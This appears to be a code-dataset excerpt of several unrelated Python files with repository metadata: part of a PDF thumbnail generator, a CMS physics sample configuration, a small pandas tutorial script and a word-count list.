cmd = '%s -dQUIET -dSAFER -dBATCH -dNOPAUSE -sDisplayHandle=0 -sDEVICE=png16m -r100 -dTextAlphaBits=4 -sOutputFile=%s -f %s' % (
self.config.GHOSTSCRIPT_COMMAND, max_path, file_path)
self.execute(cmd, self.body.id)
# generate thumbnails based on max images
for max_file in os.listdir(max_folder):
pages += 1
file_path_max = os.path.join(max_folder, max_file)
num = max_file.split('.')[0]
im = Image.open(file_path_max)
im = self.conditional_to_greyscale(im)
(owidth, oheight) = im.size
file.thumbnail[str(num)] = {
'page': int(num),
'pages': {}
}
for size in self.config.THUMBNAIL_SIZES:
(width, height) = self.scale_width_height(size, owidth, oheight)
# Two-way resizing
resizedim = im
if oheight > (height * 2.5):
# generate intermediate image with double size
resizedim = resizedim.resize((width * 2, height * 2), Image.NEAREST)
resizedim = resizedim.resize((width, height), Image.ANTIALIAS)
out_path = os.path.join(out_folder, str(size), str(num) + '.jpg')
resizedim.save(out_path, subsampling=0, quality=80)
# optimize image
cmd = '%s --preserve-perms %s' % (self.config.JPEGOPTIM_PATH, out_path)
self.execute(cmd, self.body.id)
# create mongodb object and append it to file
file.thumbnail[str(num)]['pages'][str(size)] = {
'width': width,
'height': height,
'filesize': os.path.getsize(out_path)
}
# save all generated files in minio
for size in self.config.THUMBNAIL_SIZES:
for out_file in os.listdir(os.path.join(out_folder, str(size))):
try:
self.s3.fput_object(
self.config.S3_BUCKET,
"file-thumbnails/%s/%s/%s/%s" % (self.body.id, str(file.id), str(size), out_file),
os.path.join(out_folder, str(size), out_file),
'image/jpeg'
)
except ResponseError as err:
self.datalog.error(
'Critical error saving file from File %s from Body %s' % (file.id, self.body.id))
# save in mongodb
file.thumbnailStatus = 'successful'
file.thumbnailsGenerated = datetime.datetime.now()
file.modified = datetime.datetime.now()
file.pages = pages
file.save()
# tidy up
try:
os.unlink(file_path)
except FileNotFoundError:
pass
try:
if file_path_old:
os.unlink(file_path)
except FileNotFoundError:
pass
shutil.rmtree(max_folder)
shutil.rmtree(out_folder)
def conditional_to_greyscale(self, image):
"""
Convert the image to greyscale if the image information
is greyscale only
"""
bands = image.getbands()
if len(bands) >= 3:
# histogram for all bands concatenated
hist = image.histogram()
if len(hist) >= 768:
hist1 = hist[0:256]
hist2 = hist[256:512]
hist3 = hist[512:768]
# print "length of histograms: %d %d %d" % (len(hist1), len(hist2), len(hist3))
if hist1 == hist2 == hist3:
# print "All histograms are the same!"
return image.convert('L')
return image
def scale_width_height(self, height, original_width, original_height):
factor = float(height) / float(original_height)
width = int(round(factor * original_width))
return (width, height)
| [
"[email protected]"
] | |
248b8e5a606abc28c5345081f3e44a98c551c887 | 6450234cc5339e9d05102b25b25ba38e2bd9e4cb | /MonoJetAnalysis/python/defaultMETSamples_mc.py | 7e30898207a90d75e9d21b8ec7eea5427d251ec5 | [] | no_license | wa01/Workspace | 57b87481005c441ab91a8180ddf6ea00b520aca7 | 47759c6a20473f7a694ca9e3fd4e0e8343c8018c | refs/heads/master | 2021-01-15T10:36:55.429420 | 2014-09-20T17:44:54 | 2014-09-20T17:44:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,897 | py | import copy, os, sys
allSamples = []
from Workspace.HEPHYPythonTools.createPUReweightingHisto import getPUReweightingUncertainty
S10rwHisto = getPUReweightingUncertainty("S10", dataFile = "/data/schoef/tools/PU/MyDataPileupHistogram_Run2012ABCD_60max_true_pixelcorr_Sys0.root")
S10rwPlusHisto = getPUReweightingUncertainty("S10", dataFile = "/data/schoef/tools/PU/MyDataPileupHistogram_Run2012ABCD_60max_true_pixelcorr_SysPlus5.root")
S10rwMinusHisto = getPUReweightingUncertainty("S10", dataFile = "/data/schoef/tools/PU/MyDataPileupHistogram_Run2012ABCD_60max_true_pixelcorr_SysMinus5.root")
data={}
data["name"] = "data";
data["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
data['newMETCollection'] = True
data["bins"] = ["MET-Run2012A-22Jan2013-3", "MET-Run2012B-22Jan2013", "MET-Run2012C-22Jan2013", "MET-Run2012D-22Jan2013"]
data["Chain"] = "Events"
data["Counter"] = "bool_EventCounter_passed_PAT.obj"
allSamples.append(data)
dataSingleMu={}
dataSingleMu["name"] = "data";
dataSingleMu['newMETCollection'] = True
dataSingleMu["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
dataSingleMu["bins"] = ["SingleMu-Run2012A-22Jan2013", "SingleMu-Run2012B-22Jan2013", "SingleMu-Run2012C-22Jan2013", "SingleMu-Run2012D-22Jan2013"]
dataSingleMu["Chain"] = "Events"
dataSingleMu["Counter"] = "bool_EventCounter_passed_PAT.obj"
allSamples.append(dataSingleMu)
mc={}
mc["name"] = "mc";
mc["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
mc['newMETCollection'] = True
mc["Chain"] = "Events"
#mc["reweightingHistoFile"] = "/data/schoef/tools/PU/reweightingHisto_Summer2012-S10-Run2012ABCD_60max_true_pixelcorr_Sys0.root"
#mc["reweightingHistoFileSysPlus"] = "/data/schoef/tools/PU/reweightingHisto_Summer2012-S10-Run2012ABCD_60max_true_pixelcorr_SysPlus5.root"
#mc["reweightingHistoFileSysMinus"] = "/data/schoef/tools/PU/reweightingHisto_Summer2012-S10-Run2012ABCD_60max_true_pixelcorr_SysMinus5.root"
QCD_Bins = \
["8TeV-QCD-Pt1000-MuEnrichedPt5", "8TeV-QCD-Pt120to170-MuEnrichedPt5", "8TeV-QCD-Pt170to300-MuEnrichedPt5",\
"8TeV-QCD-Pt20to30-MuEnrichedPt5", "8TeV-QCD-Pt300to470-MuEnrichedPt5", "8TeV-QCD-Pt30to50-MuEnrichedPt5",\
"8TeV-QCD-Pt470to600-MuEnrichedPt5", "8TeV-QCD-Pt50to80-MuEnrichedPt5",\
"8TeV-QCD-Pt600to800-MuEnrichedPt5", "8TeV-QCD-Pt800to1000-MuEnrichedPt5", "8TeV-QCD-Pt80to120-MuEnrichedPt5"]
#WJets_Bins = ["8TeV-WJets-HT250to300", "8TeV-WJets-HT300to400", "8TeV-WJets-HT400"]
#
DY_Bins = ["8TeV-DYJetsToLL-M10to50", "8TeV-DYJetsToLL-M50"]
#ZJets_Bins = DY_Bins
ZJetsInv_Bins = ["8TeV-ZJetsToNuNu-HT100to200", "8TeV-ZJetsToNuNu-HT200-400",\
"8TeV-ZJetsToNuNu-HT400", "8TeV-ZJetsToNuNu-HT50to100"]
#
singleTop_Bins = ["8TeV-T-t", "8TeV-T-s", "8TeV-T-tW", "8TeV-Tbar-t", "8TeV-Tbar-s", "8TeV-Tbar-tW"]
#ttbar = copy.deepcopy(mc)
#ttbar['reweightingHistoFile'] = S10rwHisto
#ttbar['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#ttbar['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#ttbar["bins"] = ["8TeV-TTJets"]
#ttbar["name"] = "TTJets"
#ttbar['reweightingHistoFile'] = S10rwHisto
#ttbar['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#ttbar['reweightingHistoFileSysMinus'] = S10rwMinusHisto
ttbarPowHeg = copy.deepcopy(mc)
ttbarPowHeg['reweightingHistoFile'] = S10rwHisto
ttbarPowHeg['reweightingHistoFileSysPlus'] = S10rwPlusHisto
ttbarPowHeg['reweightingHistoFileSysMinus'] = S10rwMinusHisto
ttbarPowHeg["bins"] = [["8TeV-TTJets-powheg-v1+2", ["8TeV-TTJets-powheg-v1", "8TeV-TTJets-powheg-v2"]]]
ttbarPowHeg["name"] = "TTJetsPowHeg"
ttbarPowHeg['reweightingHistoFile'] = S10rwHisto
ttbarPowHeg['reweightingHistoFileSysPlus'] = S10rwPlusHisto
ttbarPowHeg['reweightingHistoFileSysMinus'] = S10rwMinusHisto
wjetsInc = copy.deepcopy(mc)
wjetsInc["bins"] = ["8TeV-WJetsToLNu"]
wjetsInc["name"] = "WJetsToLNu"
wjetsInc['reweightingHistoFile'] = S10rwHisto
wjetsInc['reweightingHistoFileSysPlus'] = S10rwPlusHisto
wjetsInc['reweightingHistoFileSysMinus'] = S10rwMinusHisto
w1jets = copy.deepcopy(mc)
w1jets["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
w1jets['newMETCollection'] = True
w1jets["bins"] = ["8TeV-W1JetsToLNu"]
w1jets["name"] = "W1JetsToLNu"
w1jets['reweightingHistoFile'] = S10rwHisto
w1jets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
w1jets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
w2jets = copy.deepcopy(w1jets)
w2jets["bins"] = ["8TeV-W2JetsToLNu"]
w2jets['newMETCollection'] = True
w2jets["name"] = "W2JetsToLNu"
w2jets['reweightingHistoFile'] = S10rwHisto
w2jets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
w2jets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
w3jets = copy.deepcopy(w1jets)
w3jets["bins"] = ["8TeV-W3JetsToLNu"]
w3jets['newMETCollection'] = True
w3jets["name"] = "W3JetsToLNu"
w3jets['reweightingHistoFile'] = S10rwHisto
w3jets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
w3jets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
w4jets = copy.deepcopy(w1jets)
w4jets["bins"] = ["8TeV-W4JetsToLNu"]
w4jets['newMETCollection'] = True
w4jets["name"] = "W4JetsToLNu"
w4jets['reweightingHistoFile'] = S10rwHisto
w4jets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
w4jets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
wbbjets = copy.deepcopy(w1jets)
wbbjets["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_140212"
wbbjets['newMETCollection'] = True
wbbjets["bins"]=["8TeV-WbbJetsToLNu"]
wbbjets["name"] = "WbbJets"
wbbjets['reweightingHistoFile'] = S10rwHisto
wbbjets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
wbbjets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
wjetsHT150v2 = copy.deepcopy(mc)
wjetsHT150v2["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
wjetsHT150v2['newMETCollection'] = True
wjetsHT150v2["bins"] = ["8TeV-WJetsToLNu_HT-150To200", "8TeV-WJetsToLNu_HT-200To250", "8TeV-WJetsToLNu_HT-250To300", "8TeV-WJetsToLNu_HT-300To400", "8TeV-WJetsToLNu_HT-400ToInf"]
wjetsHT150v2["name"] = "WJetsHT150v2"
wjetsHT150v2['reweightingHistoFile'] = S10rwHisto
wjetsHT150v2['reweightingHistoFileSysPlus'] = S10rwPlusHisto
wjetsHT150v2['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#wjetsToLNuPtW100 = copy.deepcopy(mc)
#wjetsToLNuPtW100["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wjetsToLNuPtW100['newMETCollection'] = True
#wjetsToLNuPtW100["bins"] = ["8TeV-WJetsToLNu_PtW-100_TuneZ2star_8TeV_ext-madgraph-tarball"]
#wjetsToLNuPtW100["name"] = "WJetsToLNu_PtW-100_TuneZ2star_8TeV_ext-madgraph-tarball"
#wjetsToLNuPtW100['reweightingHistoFile'] = S10rwHisto
#wjetsToLNuPtW100['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wjetsToLNuPtW100['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#wjetsToLNuPtW180 = copy.deepcopy(mc)
#wjetsToLNuPtW180["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wjetsToLNuPtW180['newMETCollection'] = True
#wjetsToLNuPtW180["bins"] = ["8TeV-WJetsToLNu_PtW-180_TuneZ2star_8TeV-madgraph-tarball"]
#wjetsToLNuPtW180["name"] = "WJetsToLNu_PtW-180_TuneZ2star_8TeV-madgraph-tarball"
#wjetsToLNuPtW180['reweightingHistoFile'] = S10rwHisto
#wjetsToLNuPtW180['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wjetsToLNuPtW180['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#wjetsToLNuPtW50 = copy.deepcopy(mc)
#wjetsToLNuPtW50["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wjetsToLNuPtW50['newMETCollection'] = True
#wjetsToLNuPtW50["bins"] = ["8TeV-WJetsToLNu_PtW-50To70_TuneZ2star_8TeV-madgraph", "8TeV-WJetsToLNu_PtW-70To100_TuneZ2star_8TeV-madgraph", "8TeV-WJetsToLNu_PtW-100_TuneZ2star_8TeV-madgraph"]
#wjetsToLNuPtW50["name"] = "WJetsToLNu_PtW-50_TuneZ2star_8TeV-madgraph"
#wjetsToLNuPtW50['reweightingHistoFile'] = S10rwHisto
#wjetsToLNuPtW50['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wjetsToLNuPtW50['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#
#wMinusToLNu = copy.deepcopy(mc)
#wMinusToLNu["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wMinusToLNu['newMETCollection'] = True
#wMinusToLNu["bins"] = ["8TeV-WminusToENu", "8TeV-WminusToMuNu", "8TeV-WminusToTauNu-tauola"]
#wMinusToLNu["name"] = "WminusToLNu"
#wMinusToLNu['reweightingHistoFile'] = S10rwHisto
#wMinusToLNu['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wMinusToLNu['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#wPlusToLNu = copy.deepcopy(mc)
#wPlusToLNu["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wPlusToLNu['newMETCollection'] = True
#wPlusToLNu["bins"] = ["8TeV-WplusToENu", "8TeV-WplusToMuNu", "8TeV-WplusToTauNu-tauola"]
#wPlusToLNu["name"] = "WplusToLNu"
#wPlusToLNu['reweightingHistoFile'] = S10rwHisto
#wPlusToLNu['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wPlusToLNu['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#
dy = copy.deepcopy(mc)
dy["bins"] = DY_Bins
dy["name"] = "DY"
dy['reweightingHistoFile'] = S10rwHisto
dy['reweightingHistoFileSysPlus'] = S10rwPlusHisto
dy['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#dyJetsToLLPtZ180 = copy.deepcopy(mc)
#dyJetsToLLPtZ180["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#dyJetsToLLPtZ180['newMETCollection'] = True
#dyJetsToLLPtZ180["bins"] = ["8TeV-DYJetsToLL_PtZ-180_TuneZ2star_8TeV-madgraph-tarball"]
#dyJetsToLLPtZ180["name"] = "DYJetsToLL_PtZ-180_TuneZ2star_8TeV-madgraph-tarball"
#dyJetsToLLPtZ180['reweightingHistoFile'] = S10rwHisto
#dyJetsToLLPtZ180['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#dyJetsToLLPtZ180['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#dyJetsToLLPtZ50 = copy.deepcopy(mc)
#dyJetsToLLPtZ50["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#dyJetsToLLPtZ50['newMETCollection'] = True
#dyJetsToLLPtZ50["bins"] = ["8TeV-DYJetsToLL_PtZ-50To70_TuneZ2star_8TeV-madgraph-tarball", "8TeV-DYJetsToLL_PtZ-70To100_TuneZ2star_8TeV-madgraph-tarball", "8TeV-DYJetsToLL_PtZ-100_TuneZ2star_8TeV-madgraph"]
#dyJetsToLLPtZ50["name"] = "DYJetsToLL_PtZ-50_TuneZ2star_8TeV-madgraph-tarball"
#dyJetsToLLPtZ50['reweightingHistoFile'] = S10rwHisto
#dyJetsToLLPtZ50['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#dyJetsToLLPtZ50['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
dyJetsToLLPtZ50Ext = copy.deepcopy(mc)
dyJetsToLLPtZ50Ext['newMETCollection'] = True
dyJetsToLLPtZ50Ext["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
dyJetsToLLPtZ50Ext["bins"] = ["8TeV-DYJetsToLL_PtZ-50To70_TuneZ2star_8TeV_ext-madgraph-tarball", "8TeV-DYJetsToLL_PtZ-70To100_TuneZ2star_8TeV_ext-madgraph-tarball", "8TeV-DYJetsToLL_PtZ-100_TuneZ2star_8TeV_ext-madgraph-tarball"]
dyJetsToLLPtZ50Ext["name"] = "8TeV-DYJetsToLL_PtZ-50_TuneZ2star_8TeV_ext-madgraph-tarball"
dyJetsToLLPtZ50Ext['reweightingHistoFile'] = S10rwHisto
dyJetsToLLPtZ50Ext['reweightingHistoFileSysPlus'] = S10rwPlusHisto
dyJetsToLLPtZ50Ext['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
zinv = copy.deepcopy(mc)
zinv["bins"] = ZJetsInv_Bins
zinv["name"] = "ZJetsInv"
zinv['reweightingHistoFile'] = S10rwHisto
zinv['reweightingHistoFileSysPlus'] = S10rwPlusHisto
zinv['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#zJetsToNuNuHT50 = copy.deepcopy(mc)
#zJetsToNuNuHT50["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#zJetsToNuNuHT50['newMETCollection'] = True
#zJetsToNuNuHT50["bins"] = ["8TeV-ZJetsToNuNu_50_HT_100_TuneZ2Star_8TeV_madgraph", "8TeV-ZJetsToNuNu_100_HT_200_TuneZ2Star_8TeV_madgraph", "8TeV-ZJetsToNuNu_200_HT_400_TuneZ2Star_8TeV_madgraph", "8TeV-ZJetsToNuNu_400_HT_inf_TuneZ2Star_8TeV_madgraph"]
#zJetsToNuNuHT50["name"] = "8TeV-ZJetsToNuNu_50_TuneZ2Star_8TeV_madgraph"
#zJetsToNuNuHT50['reweightingHistoFile'] = S10rwHisto
#zJetsToNuNuHT50['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#zJetsToNuNuHT50['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#zJetsToNuNuHT50Ext = copy.deepcopy(mc)
#zJetsToNuNuHT50Ext["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#zJetsToNuNuHT50Ext['newMETCollection'] = True
#zJetsToNuNuHT50Ext["bins"] = ["8TeV-ZJetsToNuNu_50_HT_100_TuneZ2Star_8TeV_madgraph_ext", "8TeV-ZJetsToNuNu_100_HT_200_TuneZ2Star_8TeV_madgraph_ext", "8TeV-ZJetsToNuNu_200_HT_400_TuneZ2Star_8TeV_madgraph_ext", "8TeV-ZJetsToNuNu_400_HT_inf_TuneZ2Star_8TeV_madgraph_ext"]
#zJetsToNuNuHT50Ext["name"] = "8TeV-ZJetsToNuNu_50_TuneZ2Star_8TeV_madgraph_ext"
#zJetsToNuNuHT50Ext['reweightingHistoFile'] = S10rwHisto
#zJetsToNuNuHT50Ext['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#zJetsToNuNuHT50Ext['reweightingHistoFileSysMinus'] = S10rwMinusHisto
singleTop = copy.deepcopy(mc)
singleTop["bins"] = singleTop_Bins
singleTop["name"] = "singleTop"
singleTop['reweightingHistoFile'] = S10rwHisto
singleTop['reweightingHistoFileSysPlus'] = S10rwPlusHisto
singleTop['reweightingHistoFileSysMinus'] = S10rwMinusHisto
qcd = copy.deepcopy(mc)
qcd["bins"] = QCD_Bins
qcd["name"] = "QCD"
qcd['reweightingHistoFile'] = S10rwHisto
qcd['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd1 = copy.deepcopy(mc)
qcd1["bins"] = ["8TeV-QCD-Pt20to30-MuEnrichedPt5", "8TeV-QCD-Pt30to50-MuEnrichedPt5",\
"8TeV-QCD-Pt50to80-MuEnrichedPt5", "8TeV-QCD-Pt80to120-MuEnrichedPt5",\
"8TeV-QCD-Pt120to170-MuEnrichedPt5", "8TeV-QCD-Pt170to300-MuEnrichedPt5",\
"8TeV-QCD-Pt300to470-MuEnrichedPt5", "8TeV-QCD-Pt470to600-MuEnrichedPt5"]
qcd1["name"] = "QCD20to600"
qcd1['reweightingHistoFile'] = S10rwHisto
qcd1['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd1['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd1a = copy.deepcopy(mc)
qcd1a["bins"] = ["8TeV-QCD-Pt20to30-MuEnrichedPt5", "8TeV-QCD-Pt30to50-MuEnrichedPt5",\
"8TeV-QCD-Pt50to80-MuEnrichedPt5", "8TeV-QCD-Pt80to120-MuEnrichedPt5",\
"8TeV-QCD-Pt120to170-MuEnrichedPt5", "8TeV-QCD-Pt170to300-MuEnrichedPt5"]
qcd1a["name"] = "QCD20to300"
qcd1a['reweightingHistoFile'] = S10rwHisto
qcd1a['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd1a['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd1b = copy.deepcopy(mc)
qcd1b["bins"] = ["8TeV-QCD-Pt300to470-MuEnrichedPt5", "8TeV-QCD-Pt470to600-MuEnrichedPt5"]
qcd1b["name"] = "QCD300to600"
qcd1b['reweightingHistoFile'] = S10rwHisto
qcd1b['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd1b['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd2 = copy.deepcopy(mc)
qcd2["bins"] = ["8TeV-QCD-Pt600to800-MuEnrichedPt5", "8TeV-QCD-Pt800to1000-MuEnrichedPt5"]
qcd2["name"] = "QCD600to1000"
qcd2['reweightingHistoFile'] = S10rwHisto
qcd2['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd2['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd3 = copy.deepcopy(mc)
qcd3["bins"] = ["8TeV-QCD-Pt1000-MuEnrichedPt5"]
qcd3["name"] = "QCD1000"
qcd3['reweightingHistoFile'] = S10rwHisto
qcd3['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd3['reweightingHistoFileSysMinus'] = S10rwMinusHisto
####
ww = copy.deepcopy(mc)
ww["bins"] = ["8TeV-WW"]
ww["name"] = "WW"
ww['reweightingHistoFile'] = S10rwHisto
ww['reweightingHistoFileSysPlus'] = S10rwPlusHisto
ww['reweightingHistoFileSysMinus'] = S10rwMinusHisto
wz = copy.deepcopy(mc)
wz["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
wz['newMETCollection'] = True
wz["bins"] = ["8TeV-WZ"]
wz["name"] = "WZ"
wz['reweightingHistoFile'] = S10rwHisto
wz['reweightingHistoFileSysPlus'] = S10rwPlusHisto
wz['reweightingHistoFileSysMinus'] = S10rwMinusHisto
zz = copy.deepcopy(mc)
zz["bins"] = ["8TeV-ZZ"]
zz['newMETCollection'] = True
zz["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
zz["name"] = "ZZ"
zz['reweightingHistoFile'] = S10rwHisto
zz['reweightingHistoFileSysPlus'] = S10rwPlusHisto
zz['reweightingHistoFileSysMinus'] = S10rwMinusHisto
ttw = copy.deepcopy(mc)
ttw["bins"] = ["8TeV-TTWJets"]
ttw["name"] = "TTWJets"
ttw['reweightingHistoFile'] = S10rwHisto
ttw['reweightingHistoFileSysPlus'] = S10rwPlusHisto
ttw['reweightingHistoFileSysMinus'] = S10rwMinusHisto
stop200lsp170g100FastSim = copy.deepcopy(mc)
stop200lsp170g100FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop200lsp170g100FastSim["bins"] = ["8TeV-stop200lsp170g100"]
stop200lsp170g100FastSim["name"] = "stop200lsp170g100FastSim"
stop300lsp240g150FastSim = copy.deepcopy(mc)
stop300lsp240g150FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop300lsp240g150FastSim["bins"] = ["8TeV-stop300lsp240g150"]
stop300lsp240g150FastSim["name"] = "stop300lsp240g150FastSim"
stop300lsp270g175FastSim = copy.deepcopy(mc)
stop300lsp270g175FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop300lsp270g175FastSim["bins"] = ["8TeV-stop300lsp270g175"]
stop300lsp270g175FastSim["name"] = "stop300lsp270g175FastSim"
stop300lsp270FastSim = copy.deepcopy(mc)
stop300lsp270FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop300lsp270FastSim["bins"] = ["8TeV-stop300lsp270"]
stop300lsp270FastSim["name"] = "stop300lsp270FastSim"
stop300lsp270g200FastSim = copy.deepcopy(mc)
stop300lsp270g200FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop300lsp270g200FastSim["bins"] = ["8TeV-stop300lsp270g200"]
stop300lsp270g200FastSim["name"] = "stop300lsp270g200FastSim"
stop200lsp170g100FullSim = copy.deepcopy(mc)
stop200lsp170g100FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop200lsp170g100FullSim["bins"] = ["8TeV-stop200lsp170g100"]
stop200lsp170g100FullSim["name"] = "stop200lsp170g100FullSim"
stop300lsp240g150FullSim = copy.deepcopy(mc)
stop300lsp240g150FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop300lsp240g150FullSim["bins"] = ["8TeV-stop300lsp240g150"]
stop300lsp240g150FullSim["name"] = "stop300lsp240g150FullSim"
stop300lsp270g175FullSim = copy.deepcopy(mc)
stop300lsp270g175FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop300lsp270g175FullSim["bins"] = ["8TeV-stop300lsp270g175"]
stop300lsp270g175FullSim["name"] = "stop300lsp270g175FullSim"
stop300lsp270FullSim = copy.deepcopy(mc)
stop300lsp270FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop300lsp270FullSim["bins"] = ["8TeV-stop300lsp270"]
stop300lsp270FullSim["name"] = "stop300lsp270FullSim"
stop300lsp270g200FullSim = copy.deepcopy(mc)
stop300lsp270g200FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop300lsp270g200FullSim["bins"] = ["8TeV-stop300lsp270g200"]
stop300lsp270g200FullSim["name"] = "stop300lsp270g200FullSim"
for s in [stop200lsp170g100FastSim, stop300lsp240g150FastSim, stop300lsp270g175FastSim, stop300lsp270FastSim, stop300lsp270g200FastSim, stop200lsp170g100FullSim, stop300lsp240g150FullSim, stop300lsp270g175FullSim, stop300lsp270FullSim, stop300lsp270g200FullSim]:
s['reweightingHistoFile'] = S10rwHisto
s['reweightingHistoFileSysPlus'] = S10rwPlusHisto
s['reweightingHistoFileSysMinus'] = S10rwMinusHisto
| [
"[email protected]"
] | |
09efa3e2cc46a870ee131e9c706297c18b8b44e4 | 2db5bf5832ddb99e93bb949ace1fad1fde847319 | /beginLearn/googleclass/class4/pdtest.py | 3b933a6cef80f4c7bb2ba24fc99b874212470863 | [] | no_license | RoderickAdriance/PythonDemo | 2d92b9aa66fcd77b6f797e865df77fbc8c2bcd14 | 98b124fecd3a972d7bc46661c6a7de8787b8e761 | refs/heads/master | 2020-04-06T17:36:46.000133 | 2018-11-15T07:07:03 | 2018-11-15T07:07:03 | 157,666,809 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | import pandas as pd
import numpy as np
city_names=pd.Series(['San Francisco', 'San Jose', 'Sacramento'])
population = pd.Series([852469, 1015785, 485199])
cities = pd.DataFrame({'City name': city_names, 'Population': population})
california_housing_dataframe=pd.read_csv('data.csv')
california_housing_dataframe.hist('housing_median_age')
# population=population/1000
#log 实际上不是以10为底,而是以 e 为底
log_population = np.log(population)
apply = population.apply(lambda val: val > 500000)
cities['Area square miles']=pd.Series([46.87, 176.53, 97.92])
cities['Population density']=cities['Population']/cities['Area square miles']
reindex = cities.reindex([0, 5, 2, 8])
print(reindex)
| [
"[email protected]"
] | |
8c6f22eb0df54d68816c89fd47124609cdda6a8b | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/rhinocero.py | 73c56188877d4091cd9bac140d2c91b768e60ab7 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 397 | py | ii = [('LyelCPG2.py', 3), ('RogePAV2.py', 6), ('RogePAV.py', 4), ('RennJIT.py', 3), ('ProuWCM.py', 2), ('PettTHE.py', 1), ('ClarGE2.py', 1), ('CoolWHM.py', 5), ('BuckWGM.py', 22), ('LyelCPG.py', 9), ('WestJIT2.py', 4), ('CrocDNL.py', 1), ('KirbWPW2.py', 11), ('BuckWGM2.py', 3), ('FitzRNS4.py', 10), ('CoolWHM3.py', 1), ('FitzRNS.py', 1), ('FerrSDO.py', 1), ('BellCHM.py', 3), ('LyelCPG3.py', 11)] | [
"[email protected]"
] | |
